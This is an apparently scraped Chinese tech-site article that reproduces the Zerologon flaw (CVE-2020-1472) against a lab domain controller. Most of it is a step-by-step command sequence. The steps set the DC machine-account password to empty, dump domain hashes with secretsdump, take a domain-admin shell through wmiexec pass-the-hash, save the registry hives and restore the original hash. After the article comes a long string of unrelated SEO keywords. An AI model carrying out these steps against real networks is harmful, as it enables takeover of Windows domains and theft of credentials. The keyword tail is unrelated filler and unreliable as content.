千家信息网

如何实现CVE-2020-1472 漏洞复现

发表于:2024-11-24 作者:千家信息网编辑
千家信息网最后更新 2024年11月24日,本篇文章给大家分享的是有关如何实现CVE-2020-1472 漏洞复现,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。下面仅做漏洞复现记录
千家信息网最后更新 2024年11月24日如何实现CVE-2020-1472 漏洞复现

本篇文章给大家分享的是有关如何实现CVE-2020-1472 漏洞复现,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

下面仅做漏洞复现记录与实现,利用流程如下:

1.复现环境

win7跳板机IP:192.168.52.143

win2008域控IP: 192.168.52.138

2. 利用过程

检测域控是否存在漏洞

python zerologon_tester.py owa 192.168.52.138

使用漏洞利用工具将域控机器账户密码置空,该步骤可能会导致域控脱域,需要及时恢复hash

python set_empty_pw.py owa 192.168.52.138

之后使用空密码将域控的hash下载

python secretsdump.py god.org/"owa$"@192.168.52.138 -no-pass

之后使用hash通过wmiexec.py获取域管权限

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:81be2f80d568100549beac645d6a7141 administrator@192.168.52.138

执行以下命令,获取目标原始hash

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

将其下载下来

get system.save

get sam.save

get security.save

之后将获取其置空前hash

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

恢复域控hash

python reinstall_original_pw.py owa 192.168.52.138 75c1f14a63ee00aef8a5200eeff2bf88

使用空密码验证连接

域控hash已经恢复

以上就是如何实现CVE-2020-1472 漏洞复现,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注行业资讯频道。

漏洞 密码 更多 知识 篇文章 原始 实用 命令 就是 工作会 工具 文章 机器 权限 步骤 流程 环境 目标 看吧 知识点 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 俄罗斯彩票服务器在哪里 软件开发中文档不详细 测试环境 服务器 探寻贵州存放服务器的山洞 重庆科技大学城市学院互联网 通过数据库怎么分析出结果 江西时钟监控网管服务器 达梦dm8数据库主备集群 丰台ibm服务器回收价格多少 全球最有钱的互联网科技公司 石景山区特色软件开发调试 网络安全概论基础公钥英文题 河北网络安全监察部门报案 丽水云软件开发计划 数据库amp是什么 数据库表格设计的总结 自学初学软件开发教程推荐 烟台观唐互联网科技 四川线上学英语软件开发哪个好 计算机网络安全素质教育考试题库 诺顿网络安全监控怎么退出 王牌战争黑白火服务器兑换滑翔翼 南邮网络技术与应用学分 辽宁企业软件开发服务优化 信息网络安全科技馆电影 6-数据库安全 下一代网络技术预演 软件开发周记10篇 1核1g数据库怎么样 苹果app股票软件开发
0